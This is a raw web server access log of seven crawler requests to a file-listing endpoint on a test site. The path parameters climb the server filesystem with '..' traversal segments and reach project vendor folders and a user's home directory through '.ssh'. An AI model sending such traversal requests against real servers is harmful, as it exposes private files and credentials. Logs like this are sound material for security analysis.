216.73.216.46 - - [21/Aug/2025:09:14:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Ff7c78%2Findex.php HTTP/2.0" 200 18466 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "68664" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:14:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2F5d88fcbb HTTP/2.0" 200 1480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.004 "7951" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:14:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2F.. HTTP/2.0" 200 1714 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 89 0.005 "19392" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:14:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fwebonyx HTTP/2.0" 200 1380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 96 0.003 "6421" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:14:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fmikehaertl HTTP/2.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 98 0.003 "6480" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:14:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.. HTTP/2.0" 200 2108 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.004 "37230" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:14:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2F..%2F.bash_logout HTTP/2.0" 200 1013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 77 0.003 "2703" "0.003" "test.newsite.space"
